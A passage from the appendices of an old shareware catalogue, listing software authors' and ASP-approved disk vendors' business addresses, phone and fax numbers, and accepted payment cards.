1420 Interlachen Circle, Woodbury, MN 55125 + Orders & queries: 612-731-6822 + + Product: Time is Money + Author: Custom Data Solutions [Martin Schiff] + Address: 248 Wood Lake Drive, Maitland, FL 32751 + Orders & queries: 407-767-9278 + Accepts: MasterCard, Visa + + Products: Zpeller, Zpeller, Zpeller, Zpeller, Zpeller, Zpeller, + Zpeller, Zpeller, Zpeller, Zpeller, Zpeller, Zpeller, Zpeller, + Zpeller, Zpeller, Zpeller, Zpeller, Zpeller, Zpeller, Zpeller + Author: Unicorn Software Limited [Charles P. Schell IV] + Address: P.O. Box 117, Knob Noster, MO 65336-0117 + Orders: 800-2424-PSL (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 816-429-3558 + Queries: 816-429-3558 + + Products: DISK SPOOL II, DISK SPOOL II + Author: Budget Software Company [Mike Samuels] + Address: P.O. Box 621534, Littleton, CO 80162 + Orders & queries: 303-932-1705 + Accepts: MasterCard, Visa + Fax: 303-932-0336 + + Product: BOOT.SYS + Author: Salvisberg Software & Consulting [Hans Salvisberg] + Address: Bellevuestr. 18, CH-3095 Berne, SWITZERLAND + Orders: 800-2424-PSL (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: +41-31-972-42-10 + + Appendix A, "Author addresses" 771 + + + + Products: U.S. Geography Tutor, U.S. Geography Tutor, U.S. + Geography Tutor, U.S. Geography Tutor + Author: On-Target Software [Michael Russo] + Address: P.O. Box 17355, Irvine, CA 92714 + Orders & queries: 415-474-9973 + Fax: 415-474-9307 + + Products: Personal Hotnet, Personal Hotnet, Personal Hotnet + Author: Robichaux and Associates [Joey Robichaux] + Address: PO Box 842621, Houston, TX 77284-2621 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Queries: 713-463-7452 + + Products: WINPAK #1, WINPAK #1, WINPAK #1, WINPAK #1, WINPAK + #1, WINPAK #1 + Author: Rhode Island Soft Systems, Inc. + Address: P.O. Box 748, Woonsocket, RI 02895 + Orders: 800-959-7477 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 401-767-3108 + Queries: 401-767-3106 + + Product: VAR Grade + Author: VARed Software + Address: 1490 Calle Fidelidad, Thousand Oaks, CA 91360-6819 + Orders: 800-2424-PSL (orders only, please) + Queries: 805-523-7546 + + Products: 4OS2, 4OS2, 4OS2 + Author: JP Software Inc. + Address: PO Box 1470, E. Arlington, MA 02174 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 617-646-0904 + Queries: 617-646-3975 + + Products: Ravitz Editor, Ravitz Editor, Ravitz Editor + Author: Ravitz Software Inc. + Address: P.O. Box 25068, Lexington, KY 40524-5068 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 606-268-0577 + + Product: WinGraph + Author: XWare, Inc. + Address: 850 Seventh Avenue, Suite 1101, New York, NY 10019 + Orders & queries: 212-262-4481 + + Product: Checkbook Management Program + Author: M. P. Data + Address: 113 Foxport Dr., Kingsport, TN 37664-5626 + Queries: 615-349-7744 + + Appendix A, "Author addresses" 772 + + + + Products: Simply Labels, Simply Labels, Simply Labels + Author: SimpleWare [Robert E. Pitcher] + Address: 34 Earle Street, Grand Falls-Windsor, NF A2B 1E9 + CANADA + Accepts: MasterCard, Visa + Fax: 709-489-9558 + + Products: Stowaway True Archival System, Stowaway True Archival + System, Stowaway True Archival System, Stowaway True Archival + System, Stowaway True Archival System, Stowaway True Archival + System, Stowaway True Archival System, Stowaway True Archival + System, Stowaway True Archival System, Stowaway True Archival + System, Stowaway True Archival System + Author: Patri-Soft [Norm Patriquin] + Address: 5225 Canyon Crest Dr., Suite 71-358, Riverside, CA + 92507 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 909-352-1527 + Queries: 909-352-2820 + + Products: Layout, Layout, Layout, Layout + Author: Software Co-op + Address: 5437 Honey Manor Dr., Indianapolis, IN 46241 + Orders & queries: 317-856-6052 + Fax: 317-856-2086 + + Products: Tikler, Tikler, Tikler, Tikler, Tikler, Tikler, + Tikler + Author: Olsen Outdoors [Richard A. Olsen] + Address: 68 Hartwell Avenue, Littleton, MA 01460 + Orders & queries: 508-486-3985 + Accepts: MasterCard, Visa + + Products: WINWHEEL, WINWHEEL, WINWHEEL, WINWHEEL + Author: WHEEL Games [Russell Mueller] + Address: 507 Washington Gdns, Washington, NJ 07882-9205 + + Product: The Window BOSS & Data Clerk + Author: Star Guidance Consulting, Inc. [Philip A. Mongelluzzo] + Address: 273 Windy Drive, Waterbury, CT 06705 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 203-755-8842 + Queries: 203-574-2449 + + Appendix A, "Author addresses" 773 + + + + Products: PCINV, PCINV, PCINV, PCINV, PCINV + Author: Medlin Accounting Shareware + Address: 1461 Sproul Avenue, Napa, CA 94559 + Orders & queries: 707-255-4475 + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 707-255-9266 + + Product: COM-AND + Author: CABER Software + Address: P.O. Box 3607 MDSE MART, Chicago, IL 60657-0607 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 312-477-0925 + Queries: 310-439-6104 + + Product: MegaHost + Author: ASCII Computer Enterprises [Don Mankin] + Address: 231 Market Place #353, San Ramon, CA 94583 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + + Products: WinZip, WinZip + Author: Nico Mak Computing, Inc. + Address: P.O. Box 919, Bristol, CT 06011-0919 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + + Products: Windows Lotto, Windows Lotto + Author: Data Solutions + Address: 1529 Thistledown Drive, Brandon, FL 33510-2069 + Orders: 800-783-8934 (orders only, please) + Accepts: American Express, MasterCard, Optima, Visa + Fax: 813-653-3093 + Queries: 813-653-3093 + + Products: 4Print/4Book Windows, 4Print/4Book Windows + Author: Korenthal Associates, Inc. + Address: 511 Ave. of the Americas #400, New York, NY 10011 + Orders: 800-KA-PROGS (orders only, please) + Accepts: American Express, MasterCard, Optima, Visa + Fax: 212-242-2599 + Queries: 212-242-1790 + + Product: FPLAN-KWIK Financial&Retire Pln + Author: First Financial Software [Ron Kline, CFP, MBA] + Address: P.O. Box 592967, Orlando, FL 32859-2967 + Orders & queries: 800-736-4920 + Accepts: American Express, Discover, MasterCard, Optima, Visa + + Products: WHATS-UP, WHATS-UP, WHATS-UP, WHATS-UP, WHATS-UP + Author: Software for Amateur Radio + Address: P.O. Box 3419, Silver Spring, MD 20918 + Queries: 301-593-6136 + + Appendix A, "Author addresses" 774 + + + + Products: StarFlic, StarFlic, StarFlic, StarFlic, StarFlic + Author: TRIUS, Inc. [David Schulz/Paris Karahalios] + Address: P.O. BOX 249, N. Andover, MA 01845-0249 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 508-688-6381 + Queries: 508-794-9377 + + Products: Crossword Creator, Crossword Creator, Crossword + Creator + Author: PC HELP-LINE + Address: 35250 Silver Leaf Circle, Yucaipa, CA 92399 + Orders & queries: 909-797-3091 + Fax: 909-797-3091 + + Products: DAYO TIME & BILLING, DAYO TIME & BILLING, DAYO TIME & + BILLING, DAYO TIME & BILLING, DAYO TIME & BILLING, DAYO TIME & + BILLING, DAYO TIME & BILLING, DAYO TIME & BILLING, DAYO TIME & + BILLING, DAYO TIME & BILLING, DAYO TIME & BILLING, DAYO TIME & + BILLING, DAYO TIME & BILLING, DAYO TIME & BILLING, DAYO TIME & + BILLING, DAYO TIME & BILLING, DAYO TIME & BILLING, DAYO TIME & + BILLING, DAYO TIME & BILLING, DAYO TIME & BILLING, DAYO TIME & + BILLING, DAYO TIME & BILLING, DAYO TIME & BILLING, DAYO TIME & + BILLING, DAYO TIME & BILLING, DAYO TIME & BILLING + Author: TJS LAB, Inc. + Address: 5104 N. Orange Blossom Trail, #200, Orlando, FL 32810 + Orders: 800-525-3296 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 407-295-2171 + Queries: 407-291-3960 + + Products: ZIPKEY, ZIPKEY, ZIPKEY + Author: Eric Isaacson Software + Address: 416 E. University Ave., Bloomington, IN 47401-4739 + Orders & queries: 812-339-1811 + Accepts: American Express, MasterCard, Optima, Visa + + Products: Total Investor for Symphony, Total Investor for + Symphony, Total Investor for Symphony + Author: Hughes Financial Services + Address: 2 West Hanover Avenue, Suite 212, Randolph, NJ 07869 + Orders & queries: 201-895-5665 + Fax: 201-895-5525 + + Product: Bottom Line Accounting + Author: WindSoft International, Inc. [Van B. Hooper, III] + Address: P.O. Box 590006, Orlando, FL 32859-0006 + Orders: 800-542-4405 (orders only, please) + Accepts: American Express, MasterCard, Optima, Visa + Fax: 407-240-2323 + Queries: 407-240-2300 + + Appendix A, "Author addresses" 775 + + + + Product: WinPost + Author: Eastern Mountain Software + Address: P.O. Box 6394, Bellevue, WA 98008 + Queries: 206-391-3483 + + Products: Scholar Utilities, Scholar Utilities + Author: Hawk Software + Address: PO Box 3961, Regina, SK, S4P 3R9 CANADA + Orders & queries: 306-543-8899 + Fax: 306-545-0210 + + Products: SEE (File Viewer), SEE (File Viewer), SEE (File + Viewer), SEE (File Viewer), SEE (File Viewer), SEE (File + Viewer), SEE (File Viewer), SEE (File Viewer), SEE (File + Viewer), SEE (File Viewer) + Author: MicroFox Company [Jim Hass] + Address: 3310 Fox Run, PO Box 447, Richfield, OH 44286-0447 + Orders & queries: 216-659-9489 + Accepts: MasterCard, Visa + Fax: 216-659-9489 + + Products: LQ, LQ + Author: Granny's Old-Fashioned Software + Address: 297 Camp Rock Road, Boone, NC 28607 + Orders & queries: 704-264-6906 + Fax: 704-264-4634 + + Product: PowerBatch + Author: CSD, Inc. + Address: 4437 Ormond Trace, Marietta, GA 30066 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 404-926-9590 + Queries: 404-926-9565 + + Products: the last word, the last word, the last word + Author: Bit Masons Consulting [Gordon Haff] + Address: 3205 Windsor Ridge Dr., Westboro, MA 01581 + Orders & queries: 508-898-3321 + + Products: VIEW_MAN, VIEW_MAN, VIEW_MAN, VIEW_MAN, VIEW_MAN, + VIEW_MAN, VIEW_MAN + Author: MicroMetric [David Groome] + Address: 98 Dade Avenue, Sarasota, FL 34232-1609 + Orders: 800-929-0184 (orders only, please) + Accepts: + Fax: 813-377-2091 + Queries: 813-377-2515 + + Appendix A, "Author addresses" 776 + + + + Product: Flu_Shot+ + Author: Software Concepts Design + Address: Virus Acres, New Kingston, NY 12459 + Orders & queries: 914-586-2023 + Accepts: MasterCard, Visa + Fax: 914-586-2025 + + Product: ToolDriver + Author: ConVal Software, Inc. + Address: 11607 E. Butter Creek Rd., Moorpark, CA 93021 + Orders & queries: 805-529-6847 + Fax: 805-529-4314 + + Product: Touch Type Tutor for Windows + Author: Gray Design Associates + Address: PO Box 333, Northboro, MA 01532 + Orders: 800-2424-PSL (orders only, please) + + Product: BlackJack! + Author: Glencoe Computing [Donald L. Granger] + Address: 2025 Wakefield Lake, Glencoe, MO 63038-1404 + Orders & queries: 314-458-2863 + Accepts: MasterCard, Visa + + Products: Over_LAZ PS, Over_LAZ PS, Over_LAZ PS, Over_LAZ PS, + Over_LAZ PS, Over_LAZ PS + Author: Herne Data Systems Ltd + Address: PO Box 250, Tiverton, Ontario, CANADA N0G 2T0 + Orders & queries: 519-366-2732 + Accepts: MasterCard, Visa + Fax: 519-366-2732 + + Product: HDTEST + Author: Computer Counselors, Inc. + Address: 1515 West Montgomery Avenue, Rosemont, PA 19010 + Queries: 215-527-4408 + + Products: QFont, QFont + Author: Jamestown Software + Address: 2508 Valley Forge Drive, Madison, WI 53719 + Orders & queries: 608-271-2090 + + Product: ACCU Music System + Author: Kevin J. Fischer + Address: 16878 Saint James Drive, Poway, CA 92064-1137 + + Appendix A, "Author addresses" 777 + + + + Products: Personal Time Card, Personal Time Card, Personal Time + Card, Personal Time Card, Personal Time Card, Personal Time + Card + Author: Fischer Grafix & Software + Address: P.O. Box 606, Midway City, CA 92655 + Orders & queries: 714-898-7262 + Accepts: + Fax: 714-898-7262 + + Product: dPerfect Merge + Author: Newdorf Research [Barbara J. Feldman] + Address: 4212 North Lane, Del Mar, CA 92014 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 619-793-9933 + Queries: 619-793-8300 + + Product: WordMaster + Author: MasterWorks + Address: P.O. Box 116, McCleary, WA 98557 + Queries: 206-495-4574 + + Products: XFIRE: Action Puzzle game, XFIRE: Action Puzzle game, + XFIRE: Action Puzzle game, XFIRE: Action Puzzle game, XFIRE: + Action Puzzle game, XFIRE: Action Puzzle game, XFIRE: Action + Puzzle game, XFIRE: Action Puzzle game, XFIRE: Action Puzzle + game, XFIRE: Action Puzzle game, XFIRE: Action Puzzle game, + XFIRE: Action Puzzle game, XFIRE: Action Puzzle game, XFIRE: + Action Puzzle game, XFIRE: Action Puzzle game, XFIRE: Action + Puzzle game, XFIRE: Action Puzzle game, XFIRE: Action Puzzle + game, XFIRE: Action Puzzle game, XFIRE: Action Puzzle game, + XFIRE: Action Puzzle game, XFIRE: Action Puzzle game + Author: Cascoly Software [Steve Estvanik] + th + Address: 4528 36 Ave NE, Seattle, WA 98105 + Orders & queries: 206-523-6135 + Fax: 206-523-6135 + + Product: Q&A Study Aid + Author: Quid Pro Quo Software [Hal Endresen] + Address: P.O. Box 1248, Cedar Rapids, IA 52406-1248 + Orders & queries: 319-378-9140 + Accepts: MasterCard, Visa + + Products: StatTrak for Baseball, StatTrak for Baseball + Author: ALL-PRO Software Inc. + Address: 30 Maple View Court, Madison, WI 53719 + Orders: 800-776-7859 (orders only, please) + Accepts: MasterCard, Visa + Queries: 608-271-1586 + + Appendix A, "Author addresses" 778 + + + + Products: TSR Download, TSR Download, TSR Download, TSR + Download, TSR Download, TSR Download, TSR Download, TSR + Download, TSR Download, TSR Download + Author: Elfring Soft Fonts + Address: PO Box 61, Wasco, IL 60183 + Orders & queries: 708-377-3520 + Accepts: MasterCard, Visa + Fax: 708-377-6402 + + Products: Shez, Shez + Author: California Software Design [Jim Derr] + Address: P.O. Box 15284, Santa Rosa, CA 95402 + Orders & queries: 707-575-9868 + Accepts: MasterCard, Visa + + Product: Lotto Prophet + Author: DataMicro, Inc. + Address: P.O. Box 3527, Port Charlotte, FL 33948 + Orders: 800-336-7720 (orders only, please) + Fax: 813-625-2285 + Queries: 813-629-7720 + + Product: T-Zero + Author: Dennis M. Cunningham + rd + Address: 25-6 NW 23 Pl. #405, Portland, OR 97210-3534 + Orders & queries: 503-227-7751 + + Product: VERSAMAP + Author: Charles H. Culberson + Address: 8 Ritter Lane, Newark, DE 19711 + Orders & queries: 302-731-0694 + + Products: Q4Tool, Q4Tool, Q4Tool, Q4Tool + Author: CareWare [R. J. Crouch] + Address: 307 Gracie Road, Nevada City, CA 95959-3602 + Orders & queries: 916-265-8704 + + Products: Patience Abroad, Patience Abroad + Author: CoCoWare - Cowles Company Software [David A. Cowles] + Address: P.O. Box 151481, Fort Worth, TX 76108-5481 + Orders & queries: 817-367-3603 + Fax: N-A + + Products: DR. Memory, DR. Memory + Author: Cooney Applied Technology + Address: P.O. Box 292039, Kettering, OH 45429-0039 + + Appendix A, "Author addresses" 779 + + + + Product: Capital Gainz + Author: AlleyCat Software, Inc. [Dave Cohen] + Address: P.O. Box 14446, RTP, NC 27709-4446 + Orders & queries: 919-542-6117 + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 919-542-6611-(BBS) + + Products: Rosewood Journal, Rosewood Journal + Author: Rosewood Software [Bert Christensen] + Address: 135-10 Livonia Place, Scarborough, Ontario M1E 4W6 + CANADA + Orders & queries: 416-284-6119 + + Product: PCM100.COM + Author: Charier Consultants Services + Address: 64 Rue de Charenton, 75012 Paris, FRANCE + Orders & queries: 331-4001-9415 + Fax: 331-4001-0493 + + Product: EXTENDED BATCH LANGUAGE-PLUS! + Author: Seaware Corp. + Address: P.O. Box 1656, Delray Beach, FL 33444 + Orders: 800-634-8188 (orders only, please) + Accepts: MasterCard, Visa + Fax: 407-738-1712 + Queries: 407-738-1712 + + Products: PC-File, PC-File + Author: ButtonWare, Inc. + Address: PO Box 96058, Bellevue, WA 98009 + Orders: 800-528-8866 (orders only, please) + Accepts: American Express, MasterCard, Optima, Visa + Fax: 206-454-1838 + Queries: 206-454-0479 + + Product: Helpgen + Author: Rimrock Software + Address: P.O. Box 2406, Hayden, ID 83835-2406 + Orders & queries: 208-772-9347 + + Product: Amortz - Loan Schedules & More! + Author: Mountain View Software [Jim Bowyer] + th + Address: 7506 85 St E., Puyallup, WA 98371-6514 + Orders & queries: 206-845-2744 + Accepts: American Express, Discover, MasterCard, Optima, Visa + + Product: PopDBF + Author: Lighthouse Software, Inc. + Address: PO Box 9601, Peoria, IL 61612 + Orders: 800-242-4775 (orders only, please) + Accepts: + Fax: 309-673-9895 + Queries: 309-673-9886 + + Appendix A, "Author addresses" 780 + + + + Products: Smart10, Smart10 + Author: Sympathetic Software [Stephen L Billard] + Address: 9531 Telhan Drive, Huntington Beach, CA 92646 + Orders: 800-242-4775 (orders only, please) + + Product: ICP + Author: Spirit7 Software, Ltd. [Scott Bigler] + Address: PO Box 777, Waynesboro, VA 22980 + Orders & queries: 703-943-4635 + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 703-943-4635 + + Products: ON-SIDE, ON-SIDE, ON-SIDE, ON-SIDE, ON-SIDE + Author: Expressware Corporation + Address: PO Box 1800, Duvall, WA 98019 + Orders: 800-753-3453 (orders only, please) + Accepts: American Express, MasterCard, Optima, Visa + Fax: 206-788-4493 + Queries: 206-788-0932 + + Product: Rubicon Publisher + Author: Rubicon Computer Labs Inc. + Address: Box 336, Chelsea, QC, J0X 1N0 CANADA + Orders & queries: 819-770-4317 + Fax: 819-770-4317 + + Products: Hard Disk Director, Hard Disk Director, Hard Disk + Director + Author: Canyon Software [Dan Baumbach] + Address: 1537 Fourth Street, Suite 131, San Rafael, CA 94901 + Orders & queries: 415-382-7999 + Accepts: MasterCard, Visa + Fax: 415-382-7998 + + Products: SHERLOCK, SHERLOCK + Author: Gulf Sierra + Address: 14809 Clavel Street, Rockville, MD 20853-1543 + Orders & queries: 301-460-0354 + + Product: ELFTREE + Author: Elvish Consulting [Alan Avery] + Address: 1408 Noble Ave, Springfield, IL 62704-3450 + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 217-789-6169 + Queries: 217-698-8600 + + Products: Tile Match, Tile Match, Tile Match, Tile Match, Tile + Match, Tile Match, Tile Match, Tile Match, Tile Match, Tile + Match, Tile Match + Author: Arcanum Computing [Nels Anderson] + Address: 585 Edmands Road, Framingham, MA 01701-3088 + Accepts: MasterCard, Visa + Fax: 508-788-1363 + + Appendix A, "Author addresses" 781 + + + + Products: PC-Draft-CAD, PC-Draft-CAD, PC-Draft-CAD + Author: Natural Software [Michael Allen] + Address: 19 South Fifth Street, St. Charles, IL 60174 + Orders & queries: 708-377-7320 + Accepts: + + Product: Managing Your Food + Author: MYF Software [Greg Aakhus] + Address: 1504 Chinquapin Court, Bakersfield, CA 93309 + Orders: 800-995-1605 (orders only, please) + Accepts: MasterCard, Visa + Fax: 805-396-9442 + Queries: 805-398-1449 + + Products: BOXER/OS2 Text Editor, BOXER/OS2 Text Editor + Author: Boxer Software [David R. Hamel] + Address: P.O. Box 3230, Peterborough, NH 03458-3230 + Orders: 800-982-6937 (orders only, please) + Accepts: American Express, MasterCard, Optima, Visa + Fax: 603-924-4471 + Queries: 603-924-6602 + + Products: Electronic Postal Window(tm), Electronic Postal + Window(tm), Electronic Postal Window(tm) + Author: EmmaSoft Software Company, Inc. + Address: PO Box 238, Lansing, NY 14882-0238 + Orders & queries: 607-533-4685 + Accepts: American Express, MasterCard, Optima, Visa + Fax: 607-533-3524 + + Products: ProDev*QUOTE Quote/Bid System, ProDev*QUOTE Quote/Bid + System, ProDev*QUOTE Quote/Bid System + Author: Pro Dev Software [George Abbott] + Address: 545 Grover Road, Muskegon, MI 49442-9427 + Orders & queries: 616-788-2243 + Accepts: American Express, MasterCard, Optima, Visa + + Product: Personal Calendar (PC) for DOS + Author: FunStuff Software [Paul Munoz-Colman] + Address: 11645 Charter Oak Court, Suite 201, Reston, VA + 22090-4526 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 703-435-3130 + Queries: 703-435-1110 + + Appendix A, "Author addresses" 782 + + + + Products: ZPAY 3, ZPAY 3, ZPAY 3, ZPAY 3, ZPAY 3, ZPAY 3 + Author: ZPAY Payroll Systems, Inc. [Paul Mayer] + th + Address: 2526 69 Avenue South, St. Petersburg, FL + 33712-5631 + Orders: 800-468-4188 (orders only, please) + Accepts: MasterCard, Visa + Fax: 813-866-8034 + Queries: 813-866-8233 + + Products: SmartCat Plus, SmartCat Plus + Author: Shareable Software International [Michael Quinion] + Address: PO Box 59012, Schaumburg, IL 60159 + Orders: 800-622-2793 (orders only, please) + Accepts: MasterCard, Visa + Fax: 708-397-0381 + Queries: 708-397-1221 + + Products: Qanalyst, Qanalyst, Qanalyst + Author: Barn Owl Software + Address: P.O. Box 1115, O'Fallon, IL 62269 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 618-632-2339 + Queries: 618-632-7345 + + Products: Shareware Reference Guides, Shareware Reference + Guides, Shareware Reference Guides, Shareware Reference Guides, + Shareware Reference Guides, Shareware Reference Guides, + Shareware Reference Guides, Shareware Reference Guides, + Shareware Reference Guides, Shareware Reference Guides + Author: Association of Shareware Professionals + Address: 545 Grover Rd., Muskegon, MI 49442 + Fax: 616-788-2765 + Queries: 616-788-5131 + + Appendix B, "Vendor addresses" 783 + + + + + + Appendix B + Vendor addresses + + This appendix lists each ASP-approved disk vendor. These + vendors have agreed to abide by ethical standards when offering + shareware. + + + $ave On $oftware + Address: PO Box 1312, Wilkes Barre PA 18703-1312 + Phone: 717-822-9531 + + A & J Office Services + Address: PO BOX 1800, WODEN ACT 2606 AUSTRALIA + Phone: 61-6-281-4860 + + A Business Company Inc + Address: 827 Foster Ave, Brooklyn NY 11230 + Phone: 718-434-1930 + + A to Z-Ware + Address: 475 College Blvd #6215, Oceanside CA 92057 + Phone: 619-941-3189 + + A.M.U.G.CD INC + th + Address: 4131 N 24 St #A-120, Phoenix AZ 85016 + Phone: 602-553-0066 + + Accurate Research Inc + Address: 1500 Wyatt Drive # 10, SANTA CLARA CA 95054 + Phone: 408-748-9988 + + Aces Research Inc + Address: 46750 Fremont Blvd # 107, Fremont CA 94538 + Phone: 510-683-8855 + + Adams Computer Sales + Address: 7322 Avalon Dr, Fayetteville NC 28303-2419 + Phone: 919-867-6181 + + Advantage Plus Distributors + Address: 211-C South Salem St, Apex NC 27502 + Phone: 919-362-8212 + + Affordable Software + Address: 21 Blaxland Street, PO Box 472, Martrville NSW 2036 + AUSTRALIA + Phone: 61-2-311-3539 + + Appendix B, "Vendor addresses" 784 + + + + Alphon Edugames + Address: 221 RIDLEY ROAD, BRIDGEMAN DOWNS QLD 4035 AUSTRALIA + Phone: 011 61 732632744 + + Alternative Personal Software + Address: RR #3 SideRoad 27, #9126, Orton ON L0N 1N0 CANADA + Phone: 519-855-9889 + + Altez + Address: 3737 Patchett Rd, Baldwinsville NY 13027 + Phone: 315-638-4160 + + American Systems and Software + Address: 612 S Bowie St, Weatherford TX 76086 + Phone: 817-599-5858 + + Andromeda Software, Inc + Address: PO Box 270672, Fort Collins CO 80527-0672 + Phone: 716-691-4510 + + Aptos Entertainment + Address: 2906 Jolley Drive, Burbank CA 91504 + Phone: 818-848-5702 + + Ares Informatica S.L. + Address: C/ Bellaterra 33, Cornella BARCELONA 08940 SPAIN + Phone: 34-9-3-376-81-50 + + Aringna + Address: PO Box 78 Lutong, Miri SARAWAK 98107 MALAYSIA + + Ascencion Media Productions + Address: Boterstraat 12, Schiedam Z.H. 3111NC NETHERLANDS + Phone: 31-10-473-8579 + + Atlantic Coast (The Software Source) + Address: The Shareware Village, Colyton DEVON EX13 6HA ENGLAND + Phone: 44 1297 552222 + + AutoShare Inc + Address: 2661 North Illinois St Ste #204, Swansea IL 62221 + Phone: 618-344-3899 + + Aztech New Media + Address: 1 Scarsdale Road, Don Mills ON M3B 2R2 CANADA + Phone: 416-449-4787 + + Barbara's Choice + th + Address: 1039 SE 196 Ave, Portland OR 97233 + Phone: 503-666-0596 + + Appendix B, "Vendor addresses" 785 + + + + Basic Bits & Bytes + Address: 1654 Beaupre, Madison Hgts MI 48071-2685 + Phone: 810-528-9944 + + Bayside Computing Services + Address: 7344 Royal Palm Drive, Newport Richey FL 34652-1125 + Phone: 813-845-0973 + + BCS Shareware + Address: 100 North Tommy, HARRISON AR 72601 + Phone: 501-741-6512 + + Bee Software Publishing, Inc. + Address: PO BOX 1179, Hammond IN 46325 + Phone: 219-931-3761 + + Bertone Stefano + Address: via Inama 22, Milano 20133 ITALY + Phone: 39-382-617919 + + BetaCorp Technologies Inc + Address: 6770-40 Davand Dr, Mississauga ON L5T 2G3 CANADA + Phone: 905-564-2424 + + Big Byte Software + Address: 3833 Misty Meadow, Fort Worth TX 76133 + Phone: 817-292-4463 + + Bit Bang (Branch of Canadesign) + Address: PO Box 306 Station Delorimier, Montreal QB H2H 2N7 + CANADA + Phone: 514-598-8406 + + Black Box Vending Machines P/L + Address: 18 Elaine Street, KARALEE QUEENSLAND 4306 AUSTRALIA + Phone: 61 7-294-7099 + + Bright Idea! Software + Address: 5339 Prospect Road, Ste 197, San Jose CA 95129 + Phone: 408-252-0542 + + Brightspark Computers & Pick-A-Disk + Address: Unit 7, 10-12 Dewar Street, Morley Perth WEST + AUSTRALIA 6062 AUSTRALIA + Phone: 011-09-375-1178 + + BroCo Software + Address: PO Box 446, 3760 AK SOEST NETHERLANDS + Phone: 31 2155 26650 + + Buckeye Software + Address: PO BOX 672, ANTWERP OH 45813 + Phone: 419-258-2506 + + Appendix B, "Vendor addresses" 786 + + + + Budgetware + Address: 9 Albermarle Street, Newtown NSW 2042 AUSTRALIA + Phone: 011-612-519-4233 + + Buster Software + Address: PO Box 131, Verbena AL 36091-0131 + Phone: 800-598-7238 + + Campbell's Shareware Center + Address: 189 Rural Street Box 57, Austin IN 47102 + Phone: 812-794-3739 + + CAPS + Address: 5132 Marion Ave, Cypress CA 90630-4427 + Phone: 714-236-9271 + + CD Rom Paradise SRL + Address: PO Box 10177, 20100 Milano ITALY + Phone: 39 2 70603189 + + CD World Publishing Plus Corp + Address: 5018 S Price Road, Tempe AZ 85282-7445 + Phone: 602-839-3031 + + CDRP/Chestnut + Address: 101 Rogers Street, Cambridge MA 02142-1409 + Phone: 617-494-5330 + + CDV Software GmbH + Address: Neureuter Str. 37b, 76185 Karlsruhe GERMANY + Phone: 0721-972240 + + Central Computerware + Address: 183 South Main St, Templeton MA 01468 + Phone: 508-939-2138 + + Cheil Computer System Inc + Address: 138-173 Ssangmoon-Dong Dobong-Gu, Seoul 132-032 KOREA + Phone: 82-02-994-5192 + + Choice Marketing + Address: 33 Bouvardia Way, Greenwood WEST AUSTRALIA 6024 + AUSTRALIA + Phone: 2464400 + + CM Shareware Distribution + Address: PO Box 10, Smeaton SK S0J 2J0 CANADA + Phone: 306-426-2384 + + CompuData ltda + Address: Tucapel 564 Oficina 77, PO Box 2706, Concepcion CHILE + Phone: 56 41-246035 + + Appendix B, "Vendor addresses" 787 + + + + CompuSoft + Address: 6209 15TH AVE NW, Seattle WA 98107 + Phone: 206-784-8140 + + Compustuff + Address: 2759 Medina Road, Medina OH 44256 + Phone: 216-725-7729 + + Computer Advantage Company Inc + Address: 9840 Pondera Ave NW, Massillon OH 44646 + Phone: 216-854-3305 + + Computer Brokers Limited + Address: 1 Devitt Close, ASHTEAD SURREY KT21 1JS U.K. + Phone: 44 372 279441 + + Computer Habit Inc + th + Address: 8100 S 84 St, Omaha NE 68128 + Phone: 402-592-7976 + + Computer Media Concepts + Address: 4029 North Course Drive, Charlotte NC 28277-7611 + Phone: 704-544-0172 + + Computer Shareware Library + Address: Shop 1/44 Lincoln Street Strathpine, BRISBANE QLD 4500 + AUSTRALIA + Phone: 07 881 3694 + + Computer Software Library + Address: PO BOX 162, TIMARU 8615 NEW ZEALAND + Phone: +64-3-615-9333 + + Computer Solutions Dorth + Address: POSTBUS 59, NL-7213 GORSSEL NETHERLANDS + Phone: 31 5759-4545 + + Computer Solutions Software Gm + Address: Gartenstr. 2, GRAFING W-8018 GERMANY + + Computing Strategies Inc + Address: 7700 Clayton Rd Suite 302, ST LOUIS MO 63117 + Phone: 314-644-6181 + + CopyCats + Address: Postbus 1088, Heerhugowaard NL1700BB NETHERLANDS + Phone: 31 2207 45993 + + Cross Country Shareware + Address: 340 EDINBURGH ROAD NORTH, GUELPH ON N1H 7Y4 CANADA + Phone: 519-837-0777 + + Appendix B, "Vendor addresses" 788 + + + + D & L Computer Services + Address: 724-173 Creek Ridge Rd, Greensboro NC 27406 + Phone: 910-299-1067 + + D&M Enterprizes + Address: PO BOX 9, GRANGER IN 46530 + Phone: 219-271-2024 + + Daniel Group Communications + Address: PO Box 491, Lumbertown NJ 08048-0491 + Phone: 609-261-6057 + + Data Mate + Address: 24 Crestwood Lane, Lake Ronkonkoma NY 11779-1912 + Phone: 516-588-3964 + + Data Outlet Shareware + Address: PO Box 37278, RICHMOND VA 